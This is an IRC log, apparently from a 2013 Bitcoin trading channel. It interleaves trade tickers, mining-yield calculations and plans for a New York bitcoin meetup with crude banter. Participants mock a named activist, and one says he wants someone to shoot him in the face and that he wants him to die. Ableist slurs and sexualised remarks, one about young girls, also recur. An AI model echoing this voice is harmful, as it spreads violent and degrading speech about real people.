BTC [-] Apr 29 01:43:56 who of you is coming here? https://bitcointalk.org/index.php?topic=174620.msg1962101#msg1962101 Apr 29 01:45:12 [BTCTC] [BTC-GOLD] 18 @ 0.0011 = 0.0198 BTC [-] Apr 29 01:45:25 asciilifeform that one ever worked in practice ? Apr 29 01:45:48 mircea_popescu: the bulk of the U.S. economy? Apr 29 01:46:08 lol i am defeated Apr 29 01:46:46 hahaha Apr 29 01:48:29 "We had the study of the hotel room dedicated to our dealing desk, which included precision scales, and storage containers for all kinds of valuables. EUR 50 (and below) notes will be weighted as well as the gold and silver, 100-500 notes are counted." Apr 29 01:48:35 lmao what the fucking hell Apr 29 01:48:55 The trading desk with computers and monitors was in the main bedroom, which was in rontus' command. I don't remember if we traded any, though. Apr 29 01:48:58 there are tupperware containers with cash mentioned earlier Apr 29 01:49:01 x.x Apr 29 01:49:13 ok, i have just the thing for thisd Apr 29 01:50:06 [HAVELOCK] [VTX] 1 @ 0.4701 BTC [+] Apr 29 01:50:16 http://www.youtube.com/embed/UDUE6u7EZqE Apr 29 01:50:17 this. Apr 29 01:51:10 ok i'm registered for real for real now, thank you jurov Apr 29 01:52:35 i dont understand what are they singing Apr 29 01:53:06 right. Apr 29 01:53:23 and i miss cash flying in air Apr 29 01:53:46 they gonna fuck that dude with a bannana? Apr 29 01:54:19 you wish. perv. Apr 29 01:54:30 anyway, he's an ex garbage entrepreneur Apr 29 01:54:43 who sold his biz and wanted to start a stardom career. Apr 29 01:54:48 that was pretty much his only vid. Apr 29 01:57:06 [HAVELOCK] [VTX] 1 @ 0.4601 BTC [-] Apr 29 01:57:07 mircea_popescu: garbage entrepreneur? literally, like V. Putin? Apr 29 01:58:30 literally as in he ran the city dump Apr 29 01:58:34 in whatever small town Apr 29 02:00:59 http://www.youtube.com/watch?v=L8uRDLQNcI8 jeeeeeeeeeez go to 3:03 Apr 29 02:01:15 ganjix v2.0 Apr 29 02:02:29 can't believe aljazeera fell for his charms, too :DDD Apr 29 02:04:48 omg Apr 29 02:04:57 lol Apr 29 02:06:23 ugh, how did amir taaki get back in the spotlight? Apr 29 02:07:49 how could one forget him? Apr 29 02:07:52 and their text at the bottom is pretty wrong Apr 29 02:08:03 the creators and users of bitcoin are always anonymous Apr 29 02:08:13 my name is Josh Rossi and I use bitcoins...pretty easy to disprove Apr 29 02:09:06 "techology like bitcoin is like hospitals" Apr 29 02:09:10 i think that sums it up Apr 29 02:09:14 yeah Apr 29 02:09:32 we have charts graphs Apr 29 02:09:36 LOLZ Apr 29 02:09:39 lol Apr 29 02:09:44 we also have skateboards Apr 29 02:09:48 hahaha Apr 29 02:10:51 i'm not sure if he understands Apr 29 02:10:53 lol they blacklisted him Apr 29 02:11:06 [HAVELOCK] [VTX] 15 @ 0.4601 = 6.9015 BTC [-] Apr 29 02:11:07 [HAVELOCK] [VTX] 5 @ 0.4601 = 2.3005 BTC [-] Apr 29 02:11:09 "bank closed my accounts" ... Apr 29 02:11:15 yeah Apr 29 02:11:38 good to say to attract new users Apr 29 02:11:48 i mean, the govt can tax bitcoin, bitcoin doesn't make tax impossible Apr 29 02:12:13 stateless; therefore cannot be taxed or frozen Apr 29 02:12:26 retarded... Apr 29 02:12:30 surprised they would take amir seriously, another embarassing bitcoin vid... Apr 29 02:12:39 mjr___: govt could proclaim a tax on taking a shit if it wanted to. collecting is another matter. Apr 29 02:12:40 omg Apr 29 02:12:45 this is getting worse and worse Apr 29 02:12:52 when everyone is sharing.... Apr 29 02:12:54 srsly this and tux Apr 29 02:12:58 sell all your coins now! Apr 29 02:13:39 he has pimple juice on his hoodie Apr 29 02:14:00 pro Apr 29 02:14:35 fuck fuck Apr 29 02:14:48 did he just say let's bring money laundering to the common people Apr 29 02:14:55 wtf Apr 29 02:15:06 he is so fucked Apr 29 02:15:46 what the name in english when you take acid and stay in your trip Apr 29 02:15:55 will someone do a transcription? i don't understand him in person, not even on tube Apr 29 02:16:30 hopefuly its not available in html5 and mp will do it Apr 29 02:18:20 bitcoins website getting hacked LOL Apr 29 02:18:29 where is this website? Apr 29 02:19:37 lmao Apr 29 02:20:14 if only there was a way to use escrow's with bitcoin LOL Apr 29 02:20:30 its like these people don't have computers or dont know how to use google Apr 29 02:20:59 when bitcoin was hacked on wednesday LOLZ Apr 29 02:22:06 wtf is this Apr 29 02:22:11 OMG Apr 29 02:22:14 is he 12 ? Apr 29 02:22:15 yes this is dog. Apr 29 02:22:21 its not a fucking utopian dream Apr 29 02:22:22 "bitcoin" was hacked wednesday? Apr 29 02:22:25 its just a free market Apr 29 02:24:11 what about people who can't read source code Apr 29 02:26:54 i have to say, for all its tons of misinformation, they actually seem like they want to understand Apr 29 02:27:01 just need a smarter person explaining it Apr 29 02:27:06 at least the hugo guy is making some sense Apr 29 02:27:10 mjr___: what about people who can't... read. evil discrimination11!1, etc Apr 29 02:28:33 KRS-1 i will gladly hack bitcoin on wednesday for a hamburger today. Apr 29 02:29:53 usually i charge a bj but a burger will do on a sunday Apr 29 02:30:02 wtf is that thing on taaki's head Apr 29 02:30:18 he missed a spot shaving Apr 29 02:30:28 such a chav, Apr 29 02:30:32 aaanyway. Apr 29 02:30:34 lol Apr 29 02:31:06 @DRUDGE_REPORT 30m SHOCK POLL: Americans fear government more than terror. Apr 29 02:31:10 what's so shocking about that. Apr 29 02:31:15 oh wow that was a popeye reference..woa..long time Apr 29 02:32:00 yeah, people here in the states are very reprehensive about our government. I heard that our Homeland Security department has been hording up ammunition..makes you wonder why them? Apr 29 02:32:12 lol. Apr 29 02:32:15 took you a minute. Apr 29 02:32:37 someone please shoot amir in th eface Apr 29 02:32:37 How are things in Romania? I have been thinking of an exit strategy for years. Germany keeps coming to mind. Apr 29 02:32:42 do it now Apr 29 02:32:52 I want him to die Apr 29 02:33:11 but gutterpunks are so charming Apr 29 02:33:51 i feel wrong judging him superficially, but it's not like his words helped Apr 29 02:33:55 KRS-1 i'd say things are okay in romania. Apr 29 02:34:10 ThickAsThieves don't worry, we've been judging him unsuperficially for years. Apr 29 02:34:22 it's just that in some cases what's deep down is equal with what's skin deep Apr 29 02:34:27 mostly because there's nothing there. Apr 29 02:36:07 (Pls somebody sell us more Goxmoney, we are out, we can pay intl wire in 2 days, spot-3%!!) Apr 29 02:36:21 From what I understand gazpacho is more or less the national soup of Romania. Is this true? Apr 29 02:36:23 wait, so the great supernode is out of cash burnrate of 200k a year for the next 8.5 hours ? Apr 29 02:36:29 KRS-1 perfectly untrue. Apr 29 02:36:31 :DD Apr 29 02:36:54 Amazing the strange views we have of other countries. Apr 29 02:37:09 there's tripe soup, a chicken and homemade noodle-like thing soup and others that are popular. Apr 29 02:37:46 gazpacho is spanish Apr 29 02:37:59 oh thought that was russian Apr 29 02:38:18 nope. Apr 29 02:38:19 I just read the wiki on Romanian cuisine, I think the only thing I would like is the plum brandy. Apr 29 02:38:29 haha. yeah, people liked it. Apr 29 02:38:44 Eggplant is ok Apr 29 02:38:45 trust me, you'll like anything. Apr 29 02:40:06 Hmm..probably, it just sounds so different than whatever I've been used to eating. I have a pretty open mind approaching different cuisines. The only one I could never like is Indian food. Apr 29 02:40:56 I'd definately do well in Japan- I love sushi/sashimi, although they eat some pretty weird stuff over there. If I ever have to leave the U.S.A., Japan is on the radar for me also. Apr 29 02:41:05 [HAVELOCK] [VTX] 6 @ 0.4623 = 2.7738 BTC [+] Apr 29 02:41:07 [HAVELOCK] [VTX] 1 @ 0.4622 BTC [-] Apr 29 02:41:08 [HAVELOCK] [VTX] 1 @ 0.46 BTC [-] Apr 29 02:41:15 Plus the young girls there have the Hello Kitty thing going on over there, so cute. Apr 29 02:41:21 once you leave the us you suddenly discover what soert of shit you;'ve been eating Apr 29 02:41:55 lol probably..as the years go on, I notice the food has gotten much worse. Many consider us the "bread basket" of the world too..eh. Apr 29 02:42:11 Our "fast food" is the worst. Apr 29 02:42:42 yeah it's pretty bad. Apr 29 02:42:50 and yeah i imagine it;'s getting worse. Apr 29 02:43:18 at least you have fastfood Apr 29 02:43:24 From what I understand lately they inject beef with dyes to appear red, not only that our livestock is cloned and drugged with all kinds of chemicals..you can actually taste the difference between real meat. Apr 29 02:43:30 mircea_popescu: eating shit is a strictly-voluntary business, even in the U.S. - at least, right now. Apr 29 02:43:30 It doesnt even cook right. Apr 29 02:43:32 if i went out this moment, i would only have 2 options Apr 29 02:43:35 burek and kebab Apr 29 02:43:40 ok, and pizza slices Apr 29 02:43:50 Where are you orkaa? Apr 29 02:43:56 I could live on Pizza Apr 29 02:43:56 ljubljana, slovenia Apr 29 02:43:57 somalia Apr 29 02:43:59 asciilifeform not if you've never been out and dunno what food is. Apr 29 02:44:02 meh Apr 29 02:44:07 Slovenia is NOT Somalia Apr 29 02:44:20 nobody considers america the bread basket of the world Apr 29 02:44:21 right? Apr 29 02:44:29 not sure Apr 29 02:44:34 lol Apr 29 02:45:06 somalia has better food, slovenia better looking women Apr 29 02:45:13 sorry- you are right, "its been said" that America is the bread basket of N. America Apr 29 02:45:15 this because starvation after the age of 12 or so is actually beneficial. Apr 29 02:46:05 [HAVELOCK] [VTX] 2 @ 0.46220001 = 0.9244 BTC [+] Apr 29 02:46:07 [HAVELOCK] [VTX] 1 @ 0.4599 BTC [-] Apr 29 02:47:06 So, if I were to flee 1) Germany 2) Japan 3) Australia? Any other suggestions or does this seem like a pretty decent list? Apr 29 02:47:33 1 2 and 3 are all bad Apr 29 02:47:40 damn Apr 29 02:47:46 my view of the world is fsked Apr 29 02:47:48 germany is ok if you pick berlin Apr 29 02:47:50 yes, terrible choices Apr 29 02:47:57 i'd like to visit switzerland Apr 29 02:48:14 seriously..in terms of national security and prosperity? Apr 29 02:48:27 KRS-1: it makes a difference exactly what you're running away from. Apr 29 02:48:29 australia is probably the best of that lot Apr 29 02:48:37 but populated entirely by criminals Apr 29 02:48:39 what would you be fleeing from ? or do you mean emigrate ? Apr 29 02:48:40 dub, i'd rather pick germany Apr 29 02:48:41 ya srlsy. Apr 29 02:49:06 you must go to finland and stay in the supernode Apr 29 02:49:24 finland has no sun Apr 29 02:49:40 it doesn't need it Apr 29 02:49:42 it has a burn rate. Apr 29 02:49:46 lately there is a growing fear that we're in serious debt to China and they are asking that civilians be disarmed. Our Homeland Security department is hording ammunition (Who in the hell are they going to use it against except us?).. Much doubt about our currency..security.. Apr 29 02:49:57 germany has germans which are only tolerable in small doses Apr 29 02:50:00 I think we've become the fat pig that can't even breathe under our own weight. Apr 29 02:50:06 KRS-1 just go travelling about the world, see where you like it. Apr 29 02:50:09 japan is just completely fucked Apr 29 02:50:26 dub the problem is the germanettes. more like manatees Apr 29 02:50:27 mp: Thats good advice..hmm. Apr 29 02:50:34 http://www.aljazeera.com/programmes/insidestory/2013/04/20134572639241668.html Apr 29 02:50:49 http://www.aljazeera.com/programmes/insidestory/2013/04/20134572639241668.html#comment-878882931 Apr 29 02:50:59 there is my comment Apr 29 02:51:35 why are people so retarded? Apr 29 02:51:57 Australia looks like a great place to live nowadays Apr 29 02:52:08 saw the best comparison of their gun control vs ours Apr 29 02:52:30 people have to be willfully ignorant to not see that you CAN make people safer Apr 29 02:53:01 mjr: thats what i understand Apr 29 02:53:09 I dont want to give up my firearms though Apr 29 02:53:13 I have some nice weapons. Apr 29 02:53:24 My fav is the Ruger SP-101 .357 Magnum Apr 29 02:53:29 i thought all you need to do is ban violent games Apr 29 02:54:27 I never understood why people brag about their boomsticks on the Net. Why would you want to shout for a priority seat in the gasenwagen? Apr 29 02:54:38 A really excellent discussion of bitcoin. Amir is an articulate, passionate advocate... Apr 29 02:54:45 what the everloving fuck Apr 29 02:54:46 LOL Apr 29 02:54:56 comment below yours Apr 29 02:55:01 i know i saw it Apr 29 02:55:04 hilarious Apr 29 02:55:18 how did that woman know amir's name? he's anonymous obvs Apr 29 02:55:39 ajhahaha Apr 29 02:55:43 ok, best line of the day. Apr 29 02:55:48 YAY Apr 29 02:56:03 srsly, retards Apr 29 02:56:41 "how did that woman know amir's name? he's anonymous obviously!" Apr 29 02:56:48 bweahaha Apr 29 02:57:08 how could they write that? did no one say, "wait, i know his name!" Apr 29 02:57:13 meanwhile in other-retard-venue (ie http://www.cnbc.com/id/100675118 ) Apr 29 02:57:19 "Bitcoin likely has a long way to go before regulators step in and start controlling the market, and once it does get there it may not be for the right reasons. " Apr 29 02:57:35 right. because it's clear and established that anyone gives a shit about "Regulators" Apr 29 02:57:41 and they speak english rathert tyhan chinese Apr 29 02:57:43 and so forth. Apr 29 02:58:22 lolz Apr 29 02:58:38 i'm glad that their stupidity has crystalized my new heuristic Apr 29 02:59:04 whatever you are about to say, replace "bitcoin" with "dollar", do you sound retarded? If yes, don't say what you were about to say Apr 29 02:59:34 where is the website for the US Dollar? Apr 29 02:59:39 has the dollar been hacked? Apr 29 02:59:48 people use dollars for illegal transactions Apr 29 03:00:15 yes. once done with that, replace bitcoin with math Apr 29 03:00:24 also good Apr 29 03:00:24 then, "naked teenager chicks" Apr 29 03:00:29 then, dodd frank Apr 29 03:00:36 if it passes all these tests you may say it. Apr 29 03:00:40 hahaha Apr 29 03:00:49 that may be too advanced for them Apr 29 03:01:07 has dodd frank hacked the math yet ? Apr 29 03:03:18 [BTCTC] [ASICMINER-PT] 1 @ 1.275 BTC [-] Apr 29 03:03:23 [MPEX] [S.MPOE] 4745 @ 0.00071432 = 3.3894 BTC [+] Apr 29 03:03:25 [MPEX] [S.MPOE] 905 @ 0.00071588 = 0.6479 BTC [+] Apr 29 03:03:27 [BTCTC] [ASICMINER-PT] 17 @ 1.27 = 21.59 BTC [-] Apr 29 03:04:47 mircea_popescu: you should invest in YCombinator Apr 29 03:04:52 give Paul Graham some mo ney Apr 29 03:07:18 mircea_popescu mircea_popescu mircea_popescu Apr 29 03:07:44 dub dub dub wub wub wub Apr 29 03:07:49 wub wub wub wub dub dub dub Apr 29 03:08:01 dub step Apr 29 03:15:41 mp: wait what Apr 29 03:15:51 naked teenager chicks.. Apr 29 03:16:08 you have that in Romania no Apr 29 03:16:55 do you like skrillex? my fav song is voltage Apr 29 03:18:33 i heard some skrillex at "heaven" in romania :) Apr 29 03:20:16 if heaven has asses like dat, imma go baptize myself rite nao Apr 29 03:21:25 thestringpuller: wtf Apr 29 03:21:49 that is the second time in 48 hours I've been highlighted with almost the same string Apr 29 03:22:03 dub wub dub wub dub wub dub Apr 29 03:22:13 you need a business partner with the handle wub Apr 29 03:22:21 FOR MY AMUSEMENT! Apr 29 03:22:36 has dubstep just landed in murica or something? Apr 29 03:22:45 take a chill pill thestringpuller Apr 29 03:22:48 it's what all the cool kids listen to Apr 29 03:22:52 I like to make fun of it Apr 29 03:22:55 the rest of the world has already relegated it to the tradpit Apr 29 03:22:59 tardpit Apr 29 03:23:18 its normal for the cool kids in murica to lag behind by a few years Apr 29 03:23:23 whats skrillex ? Apr 29 03:23:39 dunno, some song or artist id guess Apr 29 03:23:45 skrillex is approx the worst music producer of all time Apr 29 03:23:53 a ok Apr 29 03:25:28 skrillex is like the godfather of dubstep although some would dispute that Apr 29 03:25:36 he is nothing like that Apr 29 03:25:51 no? Apr 29 03:25:56 no Apr 29 03:26:03 dub knows his step Apr 29 03:26:04 this is my fav song by skrillex- the video is kind of moving too: https://www.youtube.com/watch?v=xbsus0o0Muk Apr 29 03:26:42 dub: what would you say skrillex is to dubstep then? Apr 29 03:26:51 lol, skrillex is in no way whatsoever the godfather of dubstep Apr 29 03:27:02 'he is an artist producing dubstep music Apr 29 03:27:20 skrillex scooped up the turd that the godfathers of dubstep left behind when they woke up from teh ketamine hole they had been in when they came up with it Apr 29 03:27:20 you could also say, one of the most popular current dubstep artists Apr 29 03:27:25 [MPEX] [S.MPOE] 950 @ 0.00071 = 0.6745 BTC [-] Apr 29 03:27:27 [MPEX] [S.MPOE] 11106 @ 0.00070673 = 7.8489 BTC [-] Apr 29 03:27:29 my bad then..thanks for letting me know. I'll have to read up a bit Apr 29 03:27:49 at any rate he produces some badass music Apr 29 03:27:58 s/ass// Apr 29 03:28:02 ugh, the #bitcoin-nyc channel is already created Apr 29 03:28:09 mjr: most popular thats probably what I should have said Apr 29 03:28:11 the fact that no one is in it, sucks Apr 29 03:28:30 i would like to use that chan, but i want to moderate... Apr 29 03:28:32 mjr___ nyc is kind of marginal i guess :D Apr 29 03:28:48 #bitcoin-timisoara ? Apr 29 03:29:01 you can prolly moderate that Apr 29 03:29:03 KRS-1: like most music fads its popularity is a wedge Apr 29 03:29:19 https://www.youtube.com/watch?v=p6WJYe6n-l8 Apr 29 03:29:20 i was going to use it for listing trades at the open air exchange Apr 29 03:29:23 this is one of the old tunes Apr 29 03:29:43 also thinking about maybe a twitter feed Apr 29 03:30:01 what open air exchage Apr 29 03:30:10 Skrillex- Bangarang and Kyoto are imo the other best songs he did Apr 29 03:30:32 i plan on going to union square park Apr 29 03:30:32 kakobrekla he wants to trade gypsies for moonshine Apr 29 03:30:43 and market making Apr 29 03:30:50 dub: yes and I'm thankful for the addition to our modern music..some of it is pretty good actually. Apr 29 03:31:03 how can you call somethign that is two weeks old nostalgic Apr 29 03:31:09 i figure, if everyone knows that between 4pm and 6pm monday through friday, you can buy or sell bitcoins at one location Apr 29 03:31:21 dub: it might be two weeks old to you =) its been around Apr 29 03:31:23 it will bring liquidity to the market Apr 29 03:31:27 what do you guys think? Apr 29 03:31:27 that fat dude in the bangarang video is a trip Apr 29 03:31:47 mjr: not a bad idea at all Apr 29 03:31:53 U might be onto something Apr 29 03:31:59 mjr___ local bitcoins? Apr 29 03:32:03 i will set the spread Apr 29 03:32:05 dot com Apr 29 03:32:06 localbitcoins is nice Apr 29 03:32:08 i used it Apr 29 03:32:17 but the problem is that you have to coordinate times Apr 29 03:32:20 and locations Apr 29 03:32:23 which can be a pain Apr 29 03:32:39 i have a few other people who want to hang out in the park and trade and set markets Apr 29 03:32:41 dubstep is the retarded cousin of dnb Apr 29 03:32:57 it sounds like someone is torturing computers...and i like it Apr 29 03:33:15 mircea_popescu: what do you think of this idea? Apr 29 03:33:32 it was concieved purely to make terrible dj's look better and so fat people won't look as out of place ont he dancefloow Apr 29 03:33:38 i think it sound s a lot like how gay subculture got started :D Apr 29 03:33:59 well...that seems to have taken off pretty well, not a bad model Apr 29 03:34:11 bitcoin eye for the straight guy Apr 29 03:34:18 i can live with that Apr 29 03:34:18 anyway. grand central station. Apr 29 03:34:32 watch out that you dont get robbed Apr 29 03:34:33 you think grand central is better? Apr 29 03:34:40 yes, that is why i would be in the park Apr 29 03:34:44 police officers Apr 29 03:34:58 probably a webcam of union square park Apr 29 03:35:13 i just thought it's much quicker. Apr 29 03:35:17 its my favorite area of NYC, and my office is a block away Apr 29 03:35:37 not to mention the weather is going to be great Apr 29 03:35:46 i figure i can make a decent amount of cash just market making Apr 29 03:35:53 and by cash i mean bitcoins Apr 29 03:35:55 parks are great for buying drugs so bitcoin should work too.. :) Apr 29 03:36:10 can't hurt. Apr 29 03:36:11 union square can be tough for buying drugs Apr 29 03:36:37 in fact, most people just call their dealers...hard to find a vendor with a location LOL Apr 29 03:37:05 i was brokering a $20,000 bitcoin buy today Apr 29 03:37:15 hard to get coins quick Apr 29 03:37:33 where did you buy Apr 29 03:37:36 some guy is buying 10,000 chips from avalon Apr 29 03:37:47 and needs like 150 btc for his portion Apr 29 03:37:50 locally Apr 29 03:37:52 i didn't buy Apr 29 03:37:55 i just brokered Apr 29 03:38:05 deal isn't done yet Apr 29 03:38:12 but he paid like 148 per Apr 29 03:38:14 or around there Apr 29 03:38:21 think he needs another 50 coins tomorrow Apr 29 03:38:42 so, and this is pretty hilarious, i'm gonna sell yifu's coins to him, so he can pay yifu Apr 29 03:39:22 finally starting to get a good bitcoin sub-culture in nyc Apr 29 03:39:31 There are currently 28719.462 bitcoins demanded at or over 120.0 USD, worth 3571691.25347 USD in total. | Data vintage: 0.0060 seconds Apr 29 03:39:41 there are like almost 100 people in the facebook group bitcoinnyc Apr 29 03:39:46 and i hung out at EVR last night Apr 29 03:39:59 nice mjr___, must be all cognac and cigars over there Apr 29 03:40:00 charlie shrem's spot where they accept bitcoins Apr 29 03:40:06 [HAVELOCK] [VTX] 17 @ 0.4649 = 7.9033 BTC [+] Apr 29 03:40:19 lol, just jameson for me Apr 29 03:40:23 and cigarettes lol Apr 29 03:40:37 i'm more of a jameson and cigarettes guy than a cognac and cigars guy Apr 29 03:40:43 [08:37:32] some guy is buying 10,000 chips from avalon Apr 29 03:40:45 nothign wrong with jameson Apr 29 03:40:48 thats HOW many ghash? Apr 29 03:40:48 for cooking etc Apr 29 03:40:59 hmmm Apr 29 03:41:05 think its 282 mh per chip Apr 29 03:41:12 10,000 is the minimum to buy Apr 29 03:41:27 and i think they've sold quite a few batches Apr 29 03:41:35 diff futures? Apr 29 03:41:35 seems like it Apr 29 03:41:43 ;;calc 10000 * 282 / 1000 / 1000 Apr 29 03:41:43 2.82 Apr 29 03:41:47 2.82 TH? lawls. Apr 29 03:41:52 yeah Apr 29 03:42:00 that is quite a bit Apr 29 03:42:11 how long to generate 780 btc with 2 terrahashes Apr 29 03:42:24 ;;genrate 2000000 Apr 29 03:42:25 The expected generation output, at 2000000.0 Mhps, given difficulty of 8974296.01489, is 112.077095651 BTC per day and 4.66987898546 BTC per hour. Apr 29 03:42:26 ;;calc 2820000 Apr 29 03:42:27 2820000 Apr 29 03:42:30 er Apr 29 03:42:33 ;;genrate 282000 Apr 29 03:42:34 The expected generation output, at 282000.0 Mhps, given difficulty of 8974296.01489, is 15.8028704868 BTC per day and 0.65845293695 BTC per hour. Apr 29 03:42:35 ;;genrate 2820000 Apr 29 03:42:36 The expected generation output, at 2820000.0 Mhps, given difficulty of 8974296.01489, is 158.028704868 BTC per day and 6.5845293695 BTC per hour. Apr 29 03:42:49 ;;calc 780 / 158 Apr 29 03:42:49 4.93670886076 Apr 29 03:42:52 4.9 days Apr 29 03:42:58 though remember, those chips are only half the cost Apr 29 03:43:02 of course Apr 29 03:43:15 still have to fab the boards and mount components Apr 29 03:43:18 also Apr 29 03:43:25 the biggest cost is time Apr 29 03:43:26 yep, he has electrical engineers etc Apr 29 03:43:28 it was what 800 watts for 68gh? Apr 29 03:43:46 yep Apr 29 03:43:56 i'm not even sure what his end goal is Apr 29 03:44:00 ;;calc 2820 / 68 * 800 Apr 29 03:44:00 33176.4705882 Apr 29 03:44:03 sell mining rigs? mine all himself? Apr 29 03:44:06 33kw Apr 29 03:44:24 mjr___ simple, mine while diff low and sell the hardware then Apr 29 03:44:54 lol I'm more of a domestic beer, maybe southern comfort and cigarettes kind of guy..the country boy in me Apr 29 03:44:59 kakobrekla: heh, Im even questioning my purchase of these asicminer blades Apr 29 03:45:02 I may pull out of the bidding Apr 29 03:45:22 then what, dmc 6.0? Apr 29 03:45:27 hurr Apr 29 03:45:34 Im buying these for my private ownership Apr 29 03:45:44 a ok Apr 29 03:46:01 I currently still have an active bid for 8 of them at 32 BTC each Apr 29 03:46:47 oh since when do you have that kind of money :) Apr 29 03:47:04 truff1es: glad you like..thats what I like most about IRC, getting turned onto something that I would not have otherwise come across. Apr 29 03:47:11 I sold 371 of my asicminer shares Apr 29 03:47:24 is there news on the asicminer front? Apr 29 03:47:33 Diablo-D3 explain to me your reasoning there. Apr 29 03:47:45 they will make maybe half a btc a day, if diff stays put Apr 29 03:47:53 mircea_popescu: out of 1371. Apr 29 03:48:04 no, blades at 32 Apr 29 03:48:14 oh Apr 29 03:48:18 ;;genrate 10000 Apr 29 03:48:20 The expected generation output, at 10000.0 Mhps, given difficulty of 8974296.01489, is 0.560385478255 BTC per day and 0.0233493949273 BTC per hour. Apr 29 03:48:28 ;;calc 32 / 0.56 Apr 29 03:48:29 57.1428571429 Apr 29 03:48:35 two months IF diff stays put Apr 29 03:48:46 however that translates closer to a year since BFL apparently _is_ shipping Apr 29 03:48:50 right. Apr 29 03:48:56 so what sense does that make. Apr 29 03:49:02 its closer to a year. Apr 29 03:49:33 thats what the difficulty projections are saying Apr 29 03:49:35 and you won.t even get .5, seeing how next diff is +12% Apr 29 03:49:43 ;;bc,stats Apr 29 03:49:45 in like 50 blocks or w/e Apr 29 03:49:49 Current Blocks: 233657 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 198 blocks | Next Difficulty In About: 1 day, 3 hours, 18 minutes, and 37 seconds | Next Difficulty Estimate: 10010787.9429 | Estimated Percent Change: 11.54956 Apr 29 03:49:55 HOLY FUCKING SHIT Apr 29 03:50:02 whoa the 10mn is crossed! Apr 29 03:50:02 ha Apr 29 03:50:05 mircea_popescu: Im not sure if I want to sit on that hardware for an entire year Apr 29 03:50:06 hehe Apr 29 03:50:08 Dude june futures would have made a killing back in March Apr 29 03:50:09 FUCK Apr 29 03:50:11 iiincredible Apr 29 03:50:29 ;;nethash Apr 29 03:50:31 74111.2050128 Apr 29 03:50:34 mircea_popescu: I'd be better off waiting for a 28nm product. Apr 29 03:50:43 i guess so. Apr 29 03:50:56 ah closer tolerances is higher heat Apr 29 03:51:10 anyone know if the 51% attack on litecoin is for real or not Apr 29 03:51:24 Butterfly lab for now have the most complete package when talking about power and power consumption <-----LOL Apr 29 03:51:28 KRS-1: who cares, its litecoin Apr 29 03:51:30 only the attckers would know Apr 29 03:52:04 true..but i'm interested, I dont care if its bitcoin, buttcoin, or fuckcoin, if it makes me a buck I'd like to try it. Apr 29 03:52:12 heh Apr 29 03:52:30 wait the point of this is to make a buck? Apr 29 03:52:34 :\ Apr 29 03:53:12 Diablo-D3: i hope to see a 28nm process chip soon Apr 29 03:53:27 we all have our own interests, whatever turns our crank, namean? I don't think it necessarily makes you a loser if you are not part of the elite or mainstream. Apr 29 03:54:03 that is correct however, as of right now, i don't think BFL consumes any power! Apr 29 03:54:10 super efficient Apr 29 03:54:47 but i thought bitcoin is like hospital Apr 29 03:54:54 dunno Apr 29 03:56:28 hahaha Apr 29 03:57:36 srsly though, if any of these reporters were doing a research project for a freshman high school class, they would fail Apr 29 03:57:51 they can't take the time to plagiarize? Apr 29 03:58:14 mjr___: 28/32 might be coming sometime next year. Apr 29 03:59:01 thats sick..never thought i'd see that day Apr 29 03:59:49 they say we'd eventually come down to tolerances close to the size of atoms, although not smaller than an electron, we might have to move to photons or something, although i think photons are bigger than electrons Apr 29 04:00:08 KRS-1: you're conceptualizing it wrong Apr 29 04:00:16 :/ Apr 29 04:00:20 carbon nanotubes can get us below 5nm Apr 29 04:02:08 KRS-1: btw no Apr 29 04:02:16 photons may not have any physical size at all Apr 29 04:02:27 [BTCTC] [ASICMINER-PT] 1 @ 1.3067 BTC [+] Apr 29 04:02:31 but they have mass no? Apr 29 04:02:42 only very slight Apr 29 04:03:00 do you think the future of computing is light Apr 29 04:03:09 im not so sure rly Apr 29 04:03:13 intel is already experimenting with in chip light pipes Apr 29 04:03:24 and no, photons have no mass Apr 29 04:03:44 if so we can exploit some advantages of using quantum mechanics Apr 29 04:03:49 although you'd have to figure out how to measure the rest mass of a photon Apr 29 04:04:01 thats what i was thinking Apr 29 04:04:23 some very exciting things are happening with light and quantum mechanics Apr 29 04:04:32 i was blown away when i learned about entanglement Apr 29 04:04:37 anyhow, the size of an electron is about 3 fermi Apr 29 04:05:11 entanglement showed us that the primary rules of physics are secondary to entanglements..distance and time don't matter Apr 29 04:06:01 photons are around half a fermi Apr 29 04:06:11 also Im lagging badly, wow Apr 29 04:06:13 photons havce no rest mass Apr 29 04:06:19 they have energy-mass if threy move Apr 29 04:06:22 ah there we go...so photons do have a size but no mass- that makes much more sense. Apr 29 04:06:27 mircea_popescu: traditionally this is considered true Apr 29 04:06:29 but yes, they probably don't have a size in the classical sense Apr 29 04:06:41 mircea_popescu: it has not been experimentally been proven Apr 29 04:06:43 but its most likely true Apr 29 04:06:47 right. Apr 29 04:06:47 they're maybe "in between" mass and energy then..since mass IS energy and vice versa Apr 29 04:06:48 otherwise physics would get very weird Apr 29 04:07:03 [MPEX] [S.MPOE] 2094 @ 0.00070673 = 1.4799 BTC [-] Apr 29 04:07:07 physics does get very weird in the quantums. Apr 29 04:07:18 KRS-1: well, it has no mass because it moves at the speed of light Apr 29 04:07:29 right Apr 29 04:07:53 it DOES however have a limit of how close you can get to it Apr 29 04:08:02 anyway the future of computing must involve these principles at some point unless we will enter dark ages..no significant discoveries..that would be sad. Apr 29 04:08:13 that is where i think we will be going when moores law doesnt apply anymore. **** BEGIN LOGGING AT Mon Apr 29 12:52:26 2013 Apr 29 13:00:08 mp that guy in finland just bought 700 more btc at 134.5 he said Apr 29 13:00:20 [BTCTC] [GSDPT] 3 @ 0.00329 = 0.0099 BTC [+] Apr 29 13:00:36 i wonder what his average buy in price is Apr 29 13:00:45 but still, long term i bet he does well Apr 29 13:01:53 well it's impossible to know. if he were sane then i'm sure he'd do well. has a silver business or w/e, bought some btc, sounds good Apr 29 13:02:01 unfortunately he doesn't sound sane. Apr 29 13:02:38 i sold him the coin, i wanted to call his bluff, i did not think he had the fiat Apr 29 13:02:56 so we will see if the fiat comes in, if not lu;z will be had Apr 29 13:03:20 well wait Apr 29 13:03:25 you sent btc first ?! Apr 29 13:03:26 how many BTC? Apr 29 13:03:34 ha Apr 29 13:03:38 no i did not send first Apr 29 13:03:42 o, escrew ? Apr 29 13:03:50 he is going to send first, if/when i get the money i send btc Apr 29 13:03:53 also in the news http://polimedia.us/dtng/c/src/133475342584.jpg Apr 29 13:03:54 no escrow Apr 29 13:04:16 mircea_popescu: yuki's kitchen? Apr 29 13:04:35 it's funny cause that's the first roast beast i've seen with the hair still on. Apr 29 13:04:36 so either he does send and we ahve a good trade or he does not send and i make some lulz Apr 29 13:04:43 win-win Apr 29 13:04:52 mircea_popescu: s/roast beast/long pig/ Apr 29 13:04:57 Forbidden Apr 29 13:04:58 You 